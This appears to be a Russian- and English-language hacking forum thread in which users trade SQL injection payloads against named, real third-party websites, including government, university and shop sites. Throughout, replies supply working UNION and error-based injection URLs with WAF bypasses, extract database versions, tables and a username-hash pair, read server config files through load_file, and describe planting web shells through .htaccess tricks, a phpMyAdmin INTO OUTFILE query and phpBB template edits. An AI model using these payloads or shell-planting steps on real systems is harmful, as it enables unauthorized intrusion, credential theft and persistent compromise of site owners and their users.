Есть такой вот фильтр


PHP:
$filter[3] = array("select","delete","union","update","insert","\\","'",",",";","--","-","%20","%27"," ","`","=","%");

$data=str_replace($filter[$op],"",strtolower($data) );



И есть запрос в бд в котором он обрабатывает объект


PHP:
$db->Query("SELECT * FROM admin WHERE login='".$this->adm_name."'");



Обойти select,union можно пробелом внутри, в качестве разделителя /**/, запятые тоже не проблема. Не получается обойти кавычку, можно ли как то обойти это не пользуясь уязвимостями с мультибатовыми кодировками ? Ибо сменить ее нет возможности, может у кого есть другое решение...

trololoman96 said:
можно ли как то обойти это не пользуясь уязвимостями с мультибатовыми кодировками ? Ибо сменить ее нет возможности, может у кого есть другое решение...


Ничего ты тут не сделаешь

UPD

Я надеюсь что там с данными ничего не происходит, и именно $data попадает в $this->adm_name, и поиск идёт по $filter[3], а то может эти куски отношения друг к другу не имеют )

Так и есть, $data передается в запрос и поиск идёт по $filter[3]. Код этот используется для авторизации в админку


PHP:
$sel=$db->Query("SELECT * FROM admin WHERE login='".$this->adm_name."'");



if (0NumRows($sel)) {

$this->adm_data=$db->FetchArray($sel);

if ($this->adm_data['password'] ==$this->adm_pass) {

$_SESSION['acplogin'] =$this->adm_data['login'];

$_SESSION['acppass'] =$this->adm_data['password'];

$this->redirect("admin.php");

} else {

$this->redirect("admin.php?err=pError");

}



все портит эта кавычка

Vbulletin 4.1.7


Code:
http://fpteam-cheats.com/board/post_thanks.php?do=post_thanks_remove_user&amp='

Можно ли из этого что-то извлечь?

SHADOW785 said:
Vbulletin 4.1.7

Code:
http://fpteam-cheats.com/board/post_thanks.php?do=post_thanks_remove_user&amp='

Можно ли из этого что-то извлечь?


Нет, просто ошибка коннекта к бд. Тут дело даже не в кавычке, а в параметре post_thanks_remove_user

Code:
http://www.nalog.od.ua/l.php?id=288+union+select+1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15+--+

Не шарю как вывести

shadowrun said:

Code:
http://www.nalog.od.ua/l.php?id=288+union+select+1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15+--+

Не шарю как вывести


http://www.nalog.od.ua/l.php?id=-288+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+

что вывести то?

Gorev said:
http://www.nalog.od.ua/l.php?id=-288+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
что вывести то?


Попробуй по ссылке перейти, поймешь. Ток проксю юзай, налоговики из ЮА настолько суровые...

shadowrun said:
Попробуй по ссылке перейти, поймешь. Ток проксю юзай, налоговики из ЮА настолько суровые...



natasha:0444730b0844225c

что именно понять то?

Gorev said:
natasha:0444730b0844225c
что именно понять то?


бляяяя Я не увидел где оно выводит .

Gorev, спасибо!

Code:
http://www.hobbyshop.com.ua/dir.php?id=-223%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34+--+



Найдено достаточно много товаров, пожалуйста уточните поисковый запрос

Code:
www.guu.ru/info.php?id=-1+order+by+1+--+

Не получается раскрутить.

AnGeI said:

Code:
www.guu.ru/info.php?id=-1+order+by+1+--+

Не получается раскрутить.


Иньекции нету

AnGeI said:

Code:
www.guu.ru/info.php?id=-1+order+by+1+--+

Не получается раскрутить.


A_n_d_r_e_i прав. Но не стоит опускать руки. Есть другие


HTML:
http://www.hbs-guu.ru/news3.html?item_id=-139+and+1=1+union+select+1,2,version(),4,5,6--+f

Народ вот копался на 1м IPB форуме нашел там страничку с вот такими параметрами:


Code:
http://site.com/forum/index.php?andor_type=and&app=core&do=search&module=search&search_app=forums&search_app_filters[core][sortDir]=0&search_app_filters[core][sortKey]=date&search_app_filters[core][sortKey]=date&search_content=both&search_date_end=01/01/1967&search_date_start=01/01/1967&search_tags=17&search_term=&sid=66bd76f74ed93a979f202dc202ec3fa4

На этой странице выдало:


Code:
Site.com Driver Error

There appears to be an error with the database.

If you are seeing this page, it means there was a problem communicating with our database. Sometimes this error is temporary and will go away when you refresh the page. Sometimes the error will need to be fixed by an administrator before the site will become accessible again.

You can try to refresh the page by clicking here

Может ли эта ошибка каким нибудь способом вести к Sql иньекции или еще чему нибудь?

I have a problem here.


Code:
http://www.pasigcity.gov.ph/subpages/news.aspx?nSeq=183+and+1=0+/!*union*/+/*!select*/+0,1,2,3,4,5,6,7,8



Code:
WebKnight Application Firewall Alert

Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.

What is WebKnight?
AQTRONIX WebKnight is an application firewall for web servers and is released under the GNU General Public License. It is an ISAPI filter for securing web servers by blocking certain requests. If an alert is triggered WebKnight will take over and protect the web server.

For more information on WebKnight: http://www.aqtronix.com/WebKnight/

AQTRONIX WebKnight

How do I execute?

XSS

У меня такой нубский вопрос...

Если XSS выполняются на стороне клиента, то почему нельзя составить такой запрос на JS чтобы он например отсылал на FTP файл со сврего компа? Я понимаю что если бы это было возможно, кто-нибудь бы это уже сделал, мне просто интересно что мешает?

shadowrun said:

Code:
http://www.hobbyshop.com.ua/dir.php?id=-223%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34+--+



Бро, другой параметр пробуй


HTML:
http://www.hobbyshop.com.ua/goods.php?id=4766'-999.9+union+select+1,2,3,version(),5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2,3,4,5--+f

BlooD_BASH said:
У меня такой нубский вопрос...
Если XSS выполняются на стороне клиента, то почему нельзя составить такой запрос на JS чтобы он например отсылал на FTP файл со сврего компа? Я понимаю что если бы это было возможно, кто-нибудь бы это уже сделал, мне просто интересно что мешает?


Политика безопасности браузеров. Для жс запрет на работу с фс.

Привет, помогите разобраться:

На сайте есть fckeditor 2.3.2, Заливаю шелл smile.php.gif > smile_php.gif и хтацес, в котором

SetHandler application/x-httpd-php

При заходе на шелл target.com/files/smile_php.gif его просто качает..

В чем проблема ?

Попробуй залить .htaccess с содержанием:


PHP:
AddHandler application/x-httpd-php.gif

Ereee said:
Попробуй залить .htaccess с содержанием:

PHP:
AddHandler application/x-httpd-php.gif





Залил AddHandler application/x-httpd-php .php .html _php .png

smile.html(белая страница) i smile.png(изображение содержит ошибки..) не работают

При

AddType application/x-httpd-php .gif



Качает файл

wkar, бывает, что на некоторых серверах этот способ не могает...

Code:
http://onlinewatch24.com/watch/Harry-Potter-and-the-Half-Blood-Prince%27+un/**/ion+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+

union не нравится ему

shadowrun said:

Code:
http://onlinewatch24.com/watch/Harry-Potter-and-the-Half-Blood-Prince%27+un/**/ion+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+

union не нравится ему


Крути блиндом, по-другому не выйдет

_http://onlinewatch24.com/search?search=&p=1&f=title+and%20mid(version(),1,1)=5+--+

lightangel said:
I have a problem here.

Code:
http://www.pasigcity.gov.ph/subpages/news.aspx?nSeq=183+and+1=0+/!*union*/+/*!select*/+0,1,2,3,4,5,6,7,8


Code:
WebKnight Application Firewall Alert

Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.

What is WebKnight?
AQTRONIX WebKnight is an application firewall for web servers and is released under the GNU General Public License. It is an ISAPI filter for securing web servers by blocking certain requests. If an alert is triggered WebKnight will take over and protect the web server.

For more information on WebKnight: http://www.aqtronix.com/WebKnight/

AQTRONIX WebKnight

How do I execute?


Your request is blocking firewall on the server

In the case of a specific vulnerability in firewall, you can spend an injection. More about this http://www.ptsecurity.ru/download/PT-devteev-CC-WAF.pdf

I need a solution to my problem here.


Code:
http://accesssys.net/product_details.php?pid=109%27+and+1=0+union+selec t+1,2,3,4+--+

It's showing this.

The used SELECT statements have a different number of columns

Any help please?

lightangel

http://accesssys.net/solutions.php?sid=-100+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ve rsion(),user(),database()),10--

2lightangel /thread43966.html ты уже ***

Товарищи! Нужна ваша помощь!

короче вчера вечером тупо лазил по инету и на одной страничке нашел примерно такое:


Warning: include(fuck.php) [function.include]: failed to open stream: No such file or directory in fuck/fuck/fuck.php


подскажите вид уязвимости^^

а далее сам чего нибудь накручу

если не получится то конешно отдам вам на растерзание))

stan0009 said:
Товарищи! Нужна ваша помощь!
короче вчера вечером тупо лазил по инету и на одной страничке нашел примерно такое:
подскажите вид уязвимости^^
а далее сам чего нибудь накручу
если не получится то конешно отдам вам на растерзание))


/thread12123-including.html

/thread232773.html

но если ты тупо лазил, то уязвимости там скорее всего нет, просто ошибка подключения файла.

Code:
http://www.mp3hungama.com/music/genre_albums.php?id=-3+order+by+1,2,3,4+--+

Shows "Unknown column '4' in 'order clause'


Code:
http://www.mp3hungama.com/music/genre_albums.php?id=-3%27+/!*union*/+/!*select*/+1,2,3+--+

Showing

406 Not Acceptable

This request is not acceptable

Also, another problem.


Code:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+order+by+5 (works)!



Code:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+union+select+1,2,3,4+--+

Nothing works!

lightangel said:

Code:
http://www.mp3hungama.com/music/genre_albums.php?id=-3+order+by+1,2,3,4+--+

Shows "Unknown column '4' in 'order clause'

Code:
http://www.mp3hungama.com/music/genre_albums.php?id=-3%27+/!*union*/+/!*select*/+1,2,3+--+

Showing
406 Not Acceptable
This request is not acceptable
Also, another problem.

Code:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+order+by+5 (works)!


Code:
http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=-1+union+select+1,2,3,4+--+

Nothing works!


http://www.mp3hungama.com/music/genre_albums.php?id=3+or+1+group+by+concat(version (),rand(0)|0)+%0A+having+%0A+min(0)--+

http://168dragontrading.com/invader-zimms-bitters-action-figure-p-4840.html?cPath=1'+or+1+group+by+concat(version(), rand(0)|0)+having+min(0)--+

Что с этим можно сделать ?


Code:
http://???????.com/wp-content/themes/rttheme9/timthumb.php

Гуглится легко:

/showpost.php?p=2792868&postcount=170

Ereee said:
Гуглится легко:
/showpost.php?p=2792868&postcount=170



Большое спасибо !

Что-то не получается, прошу помощи


Code:
http://fusescience.com/wp-content/themes/rttheme9/timthumb.php

XAOCX said:
Что-то не получается, прошу помощи

Code:
http://fusescience.com/wp-content/themes/rttheme9/timthumb.php



Это не уязвимость

aydin-ka said:
Это не уязвимость


А как же это ?


Ereee said:
Гуглится легко:
/showpost.php?p=2792868&postcount=170

нашел скулю на сайте и при выводе пароля пишет такую лабуду

skankjo:�{�o��

сайт латвийский. Как решить вопрос? как поставить кодировку итальянскую себе в браузер?


=3+and+1=0+Union+Select%20+1,UNHEX%28HEX%28concat_ ws%280x3a,username,password%29%29%29%20,3,4,5,6+fr om+tbl_users+limit+3,3%20--


сам запрос

XAOCX said:
А как же это ?


Там /wp-content/plugins/module/

а не /wp-content/themes/rttheme9/

WordPress TimThumb Plugin

heks said:
нашел скулю на сайте и при выводе пароля пишет такую лабуду
skankjo:�{�o��
сайт латвийский. Как решить вопрос? как поставить кодировку итальянскую себе в браузер?
сам запрос


это бинари, скорей всего или собственная схема хеширования.

Итальянской кодировки не бывает - есть кодировки, поддерживающие итальянский, они обычно встроены в браузер - вид->кодировка и выбираешь из списка.

есть доступ к phpmyadmin на сервере, как можно залить шелл ?

Code:
http://www.onanistblog.ru/wp-content/plugins/nextgen-gallery

Не получается залить шелл

Code:
http://www.kudosshowers.co.uk/gallery.php?id=-3+order+by+2ERROR!



Code:
http://www.kudosshowers.co.uk/gallery.php?id=-3+order+by+1Clean!

But Union Select does not work.


Code:
http://www.kudosshowers.co.uk/gallery.php?id=-3+and+1=0+union+select+1

Gives error, any solution?

lightangel said:

Code:
http://www.kudosshowers.co.uk/gallery.php?id=-3+order+by+2ERROR!


Code:
http://www.kudosshowers.co.uk/gallery.php?id=-3+order+by+1Clean!

But Union Select does not work.

Code:
http://www.kudosshowers.co.uk/gallery.php?id=-3+and+1=0+union+select+1

Gives error, any solution?


http://www.kudosshowers.co.uk/gallery.php?id=-3+and+0+union+select+version()--+

Open the source

Thanks a lot.


Code:


What about this?


Code:
http://hcpoa.com/readnews.php?id=null+union+all+select+1,2,3,4+--+

lightangel said:
Thanks a lot.

Code:


What about this?

Code:
http://hcpoa.com/readnews.php?id=null+union+all+select+1,2,3,4+--+




http://hcpoa.com/readnews.php?id=1+or+1+group+by+concat(version(),f loor(rand(0)*2)%20)having+min(0)+or+1--+

Duplicate entry '3.23.581' for key 1

Antichat has taught me so much now.

Thanks for the fix.

Всем привет!)

товарищи, которые работают с sql injections.

посоветуйте прогу или лучше скажите какой вы пользуетесь для их поиска а то моя уже вымерла походу(

stan0009 said:
Всем привет!)
товарищи, которые работают с sql injections.
посоветуйте прогу или лучше скажите какой вы пользуетесь для их поиска а то моя уже вымерла походу(


Дорк и далее

MySQLi мне оч помогает

ссыль не даю ( в л.с)

Помогите разобраться

http://www.cideko.com/pro_con.php?id=3 - group by работает но union select - ошибка

и

http://www.greenbergresearch.com/index.php?ID=1 тоже самое

никак не могу обойти фильтрацию

zenon3 said:
Помогите разобраться
http://www.cideko.com/pro_con.php?id=3 - group by работает но union select - ошибка
и
http://www.greenbergresearch.com/index.php?ID=1 тоже самое
никак не могу обойти фильтрацию




Code:
http://www.greenbergresearch.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(he x(database())),14--+f

Warning: main(/var/www/html/inc/templates/greenbergdevDB): failed to open stream: No such file or directory in /var/www/html/index.php on line 195

http://www.greenbergresearch.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(he x(user())),14--+f

Warning: main(/var/www/html/inc/templates/greenbergUser@localhost): failed to open stream: No such file or directory in /var/www/html/index.php on line 195

zenon3


http://www.cideko.com/pro_con.php?id=3 - group by работает но union select - ошибка


тут мускул 3, поэтому ругается на обединение запросов

sl1k said:
есть доступ к phpmyadmin на сервере, как можно залить шелл ?




Code:
CREATE TABLE `test_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ; INSERT INTO `test_shell` ( `shl` ) VALUES (`пхп-код`); SELECT `shl` FROM `test_shell` INTO OUTFILE `путь/имяфайла.php` DROP TABLE `test_shell`

Реально ли залить картинку с пхп кодом внутри и сохранить этот код после обработки?

В начале файла добавляется: CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90

ну и пхп код сносит само собой

help

I have a WAF problem..


Code:
http://www.iccs.edu/news_details.php?id=-5%27+un/**/ion+se/**/lect+1,2,3,4,5+--+



Code:
http://www.iccs.edu/news_details.php?id=-5%27+UNunionION+SEselectLECT+1,2,3,4,5+--+

But can't find vulnerable number!

Any help?

lightangel said:
I have a WAF problem..

Code:
http://www.iccs.edu/news_details.php?id=-5%27+un/**/ion+se/**/lect+1,2,3,4,5+--+


Code:
http://www.iccs.edu/news_details.php?id=-5%27+UNunionION+SEselectLECT+1,2,3,4,5+--+

But can't find vulnerable number!
Any help?


http://www.iccs.edu/news_details.php?id=5+and+0+/*!UnIoN+SeLeCt*/+1,2,3,4,5--+

lightangel

try to understand a principle of injection

no need to add a quote after vuln Parameter, if injection type is INTEGER, you'll just break the syntax

Thanks. Is this site vulnerable?


Code:
http://www.vidol.gov/dol_news.php?page=-3'

And I did everything showing it's injectable.

Problem is, I tried error based, only brings this error.


Code:
http://www.vidol.gov/dol_news.php?errmsg=You+have+specified+an+invalid+ page+number.

Any help?

lightangel, read this article:

/thread104591.html

(about sql inj)

and this: /threadnav43966-1-10.html

lightangel

it's not vuln

use logical expressions to check it, instead of "-"

SergioBlog said:
Реально ли залить картинку с пхп кодом внутри и сохранить этот код после обработки?
В начале файла добавляется: CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
ну и пхп код сносит само собой


нет.

Sorry for bringing back WAF topic.

I have read all articles on SQL Injection in antichat so don't think should be given again.


Code:
http://www.worldstyling.com/web/product_detail.php?id=-95/*!UnIoN+SeLeCt*/1,2,3,4,5+--+

Once I want to get union it tells Not Found, Not Found.

www.allaboutjazz.com/php/article_archive.php'

как раскрутить? Использование пробелов в корне запрещено

www.allaboutjazz.com/php/article_archive.php'or(ExtractValue(1,concat(0x3a, version())))='1

пишет FUNCTION allaboutjazz.ExtractValue does not exist

какие еще могут быть варианты?

Code:
http://www.worldstyling.com/web/product_detail.php?id=95/*!UnIoN!*/+/!*SeLeCt*!/1,2,3,4,5+--+

tried all WAF solution, nothing comes.

And also, checked souurce.

lightangel said:

Code:
http://www.worldstyling.com/web/product_detail.php?id=95/*!UnIoN!*/+/!*SeLeCt*!/1,2,3,4,5+--+

tried all WAF solution, nothing comes.
And also, checked souurce.


http://www.worldstyling.com/web/product_detail.php?id=95'+or+1+group+by+concat_ws( 0x3a,version(),rand(0)|0)+having+min(0)--+

Народ, что это ?


Code:
http://foto4u.info/go.php?link=video&s=100&url=%0d%0a%20SomeCustomInjectedHeader%3ainjected_b y_wvs

XAOCX said:
Народ, что это ?

Code:
http://foto4u.info/go.php?link=video&s=100&url=%0d%0a%20SomeCustomInjectedHeader%3ainjected_b y_wvs



acunetix

Gorev said:
acunetix


Что с этим можно сделать ?

XAOCX said:
Что с этим можно сделать ?


SomeCustomInjectedHeader

переведи и подумай...

Gorev said:
SomeCustomInjectedHeader
переведи и подумай...



Шелл получится залить ?

PHP:
http://www.gospelmp3.ru/artists/?id=-39%27+union+select+1,2,3,4,5,6,column_name,8,9,10, 11,12,13+from+information_schema.columns+where+tab le_name=0x7061676573--+

Почему не выводит колонки?? (вывод дполжен быть в титле)

Похоже на то что where фильтруется, можешь попорбывать крутить так:


Code:
http://www.gospelmp3.ru/news/?id=-115+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,ta ble_name,column_name%29,9,10,11,12,13,14,15+from+i nformation_schema.columns+limit+1,1--&n_action=read

перебирая лимит пока не найдешь то что нужно, руками конечно муторно но думаю накидать скриптик который сдампит структуру не проблема.

есть досьуп к админке на движке phpbb, могу править шаблоны, как залить туда шелл?? какой код вставить?

Откройте Администраторский раздел => Общие => Безопасность

Разрешите php в шаблонах и сохраните настройки

Откройте Администраторский раздел => Стили => Шаблоны

Напортив активного шаблона нажмите "Изменить"

Выберите файл шаблона, в который хотите вставить php, например "overall_footer.html"

В нужное место вставьте

как то криво все встает, и допустим я закачаю шелл потом на форум и гдде он будет лежать?

DyukiN said:
как то криво все встает, и допустим я закачаю шелл потом на форум и гдде он будет лежать?


правь шаблон фака..на форуме он будет forum.com/faq.php

Code:
http://eafangames.com/live_score_tennis.php/flash_games_online.php
?channel=76'%00 order by 1--

в чём проблемма не могу понять!подскажите!

Gorev said:
правь шаблон фака..на форуме он будет forum.com/faq.php


Я правил его, тоже ничего не получается(( дайте пжл мне пшп код в пм)

Faaax said:

Code:
http://eafangames.com/live_score_tennis.php/flash_games_online.php
?channel=76'%00 order by 1--

в чём проблемма не могу понять!подскажите!




Code:
http://eafangames.com/live_score_tennis.php/flash_games_online.php?channel=76'%29+union+select +@@version--%201#inscore_ifheight_xdc_500

Done!

Подскажите, почему не выводит данные из таблицы?


PHP:
http://english.in.ua/contacts.php?id=8+or+1+group+by+concat%28%28select +email+from+acc_users+limit+12,1%29,floor%28rand%2 80%29*2%29%29having+min%280%29+or+1--+#

o'clock said:
File_Priv from mysql.user
через вывод естественно


а если мне пишет что

SELECT command denied to user 'блаблабла'@'localhost' for table 'user'

ет чё значит?

qaz said:
а если мне пишет что
SELECT command denied to user 'блаблабла'@'localhost' for table 'user'
ет чё значит?


значит у данного юзера нет прав для доступа к таблице user.

Пользуйтесь переводчиком!

Подскажите, почему не выводит данные из таблицы?


PHP:
http://english.in.ua/contacts.php?id=8+or+1+group+by+concat%28%28select +email+from+acc_users+limit+12,1%29,floor%28rand%2 80%29*2%29%29having+min%280%29+or+1--+#

qaz said:
Подскажите, почему не выводит данные из таблицы?

PHP:
http://english.in.ua/contacts.php?id=8+or+1+group+by+concat%28%28select +email+from+acc_users+limit+12,1%29,floor%28rand%2 80%29*2%29%29having+min%280%29+or+1--+#





Используй конструкцию cast as char


Code:
http://english.in.ua/contacts.php?id=8+and(select+1+from(select+count(* ),concat((select+(select+(select+table_name+from+i nformation_schema.tables+where+table_schema=0x656C 636B6965765F6272616E63685F31+limit+11,1))+from+inf ormation_schema.tables+limit+0,1),floor(rand(0)*2) )x+from+information_schema.tables+group+by+x)a)+an d+1=1

http://english.in.ua/contacts.php?id=8+and(select+1+from(select+count(* ),concat((select+(select+(select+cast(acc_users.em ail+as+char)+from+elckiev_branch_1.acc_users+limit +8,1)+)+from+information_schema.tables+limit+0,1), floor(rand(0)*2))x+from+information_schema.tables+ group+by+x)a)+and+1=1

Вот нашел уязвимость:


Code:
http://www.eash.eu/openletter2011/index.php?file=stylesheet.css

А дальше можно как-то развить ее?

~EviL~ said:
Вот нашел уязвимость:

Code:
http://www.eash.eu/openletter2011/index.php?file=stylesheet.css

А дальше можно как-то развить ее?


Это не уязвимость

~EviL~ said:
Вот нашел уязвимость:

Code:
http://www.eash.eu/openletter2011/index.php?file=stylesheet.css

А дальше можно как-то развить ее?


так сделай


http://www.eash.eu/openletter2011/index.php?file=show.php&ref=-21308+union+select+1,2,3,4,5,6,7,(select(@x)from(s elect(@x:=0x00),(select(null)from(information_sche ma.columns)where(table_schema!=0x696e666f726d61746 96f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c 62723e,table_schema,0x2e,table_name,0x3a,column_na me))))x),9,10,11,12,13,14,15,16,17,18,19,20+--+

Если вбить кавычку в пост-параметр, то вылазит ошибка вида


HTML:
Error query: UPDATE `userdata` SET `email`='666@666.ru', `mobile`='', `hometel`='', `icq`=''', `website`='', `forumnick`='' WHERE (`uid`='50536')

конкретно это icq.Я так понимаю, что кроме того, что я вижу название таблицы,то больше ничего не добиться ?

t3cHn0iD said:
Если вбить кавычку в пост-параметр, то вылазит ошибка вида

HTML:
Error query: UPDATE `userdata` SET `email`='666@666.ru', `mobile`='', `hometel`='', `icq`=''', `website`='', `forumnick`='' WHERE (`uid`='50536')

конкретно это icq.Я так понимаю, что кроме того, что я вижу название таблицы,то больше ничего не добиться ?


в уязвимый параметр пиши select lol from troll и смотри результат выборки в анкете, или от чего это инфа. подзапрос же, ну ты понел..

Загрузил через load_file httpd.conf и не могу найти путь к сайту. Где он тут прописан?

Web Server: Apache/2.2.15 (Linux/SUSE)


Code:
# /etc/apache2/httpd.conf
#
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See for detailed information about
# the directives.

# Based upon the default apache configuration file that ships with apache,
# which is based upon the NCSA server configuration files originally by Rob
# McCool. This file was knocked together by Peter Poeml .

# If possible, avoid changes to this file. It does mainly contain Include
# statements and global settings that can/should be overridden in the
# configuration of your virtual hosts.

# Quickstart guide:
# http://en.opensuse.org/Apache_Quickstart_HOWTO

# Overview of include files, chronologically:
#
# httpd.conf
# |
# |-- uid.conf . . . . . . . . . . . . . . UserID/GroupID to run under
# |-- server-tuning.conf . . . . . . . . . sizing of the server (how many processes to start, ...)
# |-- sysconfig.d/loadmodule.conf . . . . . load these modules
# |-- listen.conf . . . . . . . . . . . . . IP adresses / ports to listen on
# |-- mod_log_config.conf . . . . . . . . . define logging formats
# |-- sysconfig.d/global.conf . . . . . . . server-wide general settings
# |-- mod_status.conf . . . . . . . . . . . restrict access to mod_status (server monitoring)
# |-- mod_info.conf . . . . . . . . . . . . restrict access to mod_info
# |-- mod_usertrack.conf . . . . . . . . . defaults for cookie-based user tracking
# |-- mod_autoindex-defaults.conf . . . . . defaults for displaying of server-generated directory listings
# |-- mod_mime-defaults.conf . . . . . . . defaults for mod_mime configuration
# |-- errors.conf . . . . . . . . . . . . . customize error responses
# |-- ssl-global.conf . . . . . . . . . . . SSL conf that applies to default server _and all_ virtual hosts
# |
# |-- default-server.conf . . . . . . . . . set up the default server that replies to non-virtual-host requests
# | |--mod_userdir.conf . . . . . . . . enable UserDir (if mod_userdir is loaded)
# | `--conf.d/apache2-manual?conf . . . add the docs ('?' = if installed)
# |
# |-- sysconfig.d/include.conf . . . . . . your include files
# | (for each file to be included here, put its name
# | into APACHE_INCLUDE_* in /etc/sysconfig/apache2)
# |
# `-- . . . . . . . . . . . . . . for each virtual host, place one file here
# `-- *.conf . . . . . . . . . . . . . (*.conf is automatically included)
#
#
# Files marked are created from sysconfig upon server restart: instead of
# these files, you edit /etc/sysconfig/apache2

# Filesystem layout:
#
# /etc/apache2/
# |-- charset.conv . . . . . . . . . . . . for mod_auth_ldap
# |-- conf.d/
# | |-- apache2-manual.conf . . . . . . . conf that comes with apache2-doc
# | |-- mod_php4.conf . . . . . . . . . . (example) conf that comes with apache2-mod_php4
# | `-- ... . . . . . . . . . . . . . . . other configuration added by packages
# |-- /etc/apache2/
# |-- errors.conf
# |-- httpd.conf . . . . . . . . . . . . . top level configuration file
# |-- listen.conf
# |-- magic
# |-- mime.types -> ../mime.types
# |-- mod_autoindex-defaults.conf
# |-- mod_info.conf
# |-- mod_log_config.conf
# |-- mod_mime-defaults.conf
# |-- mod_perl-startup.pl
# |-- mod_status.conf
# |-- mod_userdir.conf
# |-- mod_usertrack.conf
# |-- server-tuning.conf
# |-- ssl-global.conf
# |-- ssl.crl/ . . . . . . . . . . . . . . PEM-encoded X.509 Certificate Revocation Lists (CRL)
# |-- ssl.crt/ . . . . . . . . . . . . . . PEM-encoded X.509 Certificates
# |-- ssl.csr/ . . . . . . . . . . . . . . PEM-encoded X.509 Certificate Signing Requests
# |-- ssl.key/ . . . . . . . . . . . . . . PEM-encoded RSA Private Keys
# |-- ssl.prm/ . . . . . . . . . . . . . . public DSA Parameter Files
# |-- sysconfig.d/ . . . . . . . . . . . . files that are created from /etc/sysconfig/apache2
# | |-- global.conf
# | |-- include.conf
# | `-- loadmodule.conf
# |-- uid.conf
# `-- vhosts.d/ . . . . . . . . . . . . . . put your virtual host configuration (*.conf) here
# |-- vhost-ssl.template
# `-- vhost.template

### Global Environment ################################################## ####
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests.

# run under this user/group id
Include /etc/apache2/uid.conf

# - how many server processes to start (server pool regulation)
# - usage of KeepAlive
Include /etc/apache2/server-tuning.conf

# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a
# container, that host's errors will be logged there and not here.
ErrorLog /var/log/apache2/error_log

# generated from APACHE_MODULES in /etc/sysconfig/apache2
Include /etc/apache2/sysconfig.d/loadmodule.conf

# IP addresses / ports to listen on
Include /etc/apache2/listen.conf

# predefined logging formats
Include /etc/apache2/mod_log_config.conf

# generated from global settings in /etc/sysconfig/apache2
Include /etc/apache2/sysconfig.d/global.conf

# optional mod_status, mod_info
Include /etc/apache2/mod_status.conf
Include /etc/apache2/mod_info.conf

# optional cookie-based user tracking
# read the documentation before using it!!
Include /etc/apache2/mod_usertrack.conf

# configuration of server-generated directory listings
Include /etc/apache2/mod_autoindex-defaults.conf

# associate MIME types with filename extensions
TypesConfig /etc/apache2/mime.types
DefaultType text/plain
Include /etc/apache2/mod_mime-defaults.conf

# set up (customizable) error responses
Include /etc/apache2/errors.conf

# global (server-wide) SSL configuration, that is not specific to
# any virtual host
Include

# forbid access to the entire filesystem by default

Options Indexes
AllowOverride None
Order deny,allow
Deny from all

# use .htaccess files for overriding,
AccessFileName .htaccess
# and never show them

Order allow,deny
Deny from all

# List of resources to look for when the client requests a directory
DirectoryIndex index.html index.html.var

### 'Main' server configuration #############################################
#
# The directives in this section set up the values used by the 'main'
# server, which responds to any requests that aren't handled by a
# definition. These values also provide defaults for
# any containers you may define later in the file.
#
# All of these directives may appear inside containers,
# in which case these default settings will be overridden for the
# virtual host being defined.
#
Include /etc/apache2/default-server.conf

# Another way to include your own files
#
# The file below is generated from /etc/sysconfig/apache2,
# include arbitrary files as named in APACHE_CONF_INCLUDE_FILES and
# APACHE_CONF_INCLUDE_DIRS
Include /etc/apache2/sysconfig.d/include.conf

### Virtual server configuration ############################################
#
# VirtualHost: If you want to maintain multiple domains/hostnames on your
# machine you can setup VirtualHost containers for them. Most configurations
# use only name-based virtual hosts so the server doesn't need to worry about
# IP addresses. This is indicated by the asterisks in the directives below.
#
# Please see the documentation at
#
# for further details before you try to setup virtual hosts.
#
# You may use the command line option '-S' to verify your virtual host
# configuration.
#
Include /etc/apache2/vhosts.d/*.conf

# Note: instead of adding your own configuration here, consider
# adding it in your own file (/etc/apache2/httpd.conf.local)
# putting its name into APACHE_CONF_INCLUDE_FILES in
# /etc/sysconfig/apache2 -- this will make system updates
# easier :)

Include /etc/apache2/vhosts.d/*.conf


Как-бы намекает.

~EviL~ said:
Вот нашел уязвимость:

Code:
http://www.eash.eu/openletter2011/index.php?file=stylesheet.css

А дальше можно как-то развить ее?


LFI, но похоже, что из директории не выпускает.

http://www.eash.eu/phpmyadmin/print.css- файл есть

http://www.eash.eu/openletter2011/index.php?file=../phpmyadmin/print.css - файла нет

Можно почитать файлы, к которым нет доступа через сайт:

http://www.eash.eu/openletter2011/index.php?file=.htaccess

Использовать для XSS:

http://www.eash.eu/openletter2011/index.php?file=

Или просто найти другой баг на сайте, как было написано выше =)


Code:
http://www.eash.eu/openletter2011/index.php?file=show.php&ref=-1+and+1=0+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a,version(),user(),database()),9,10,11,12,13,14,15 ,16,17,18,19,20+--+

5.1.49-3:eash_live@localhost:eash_live

Кавычки не фильтруются и не экранируются

Code:
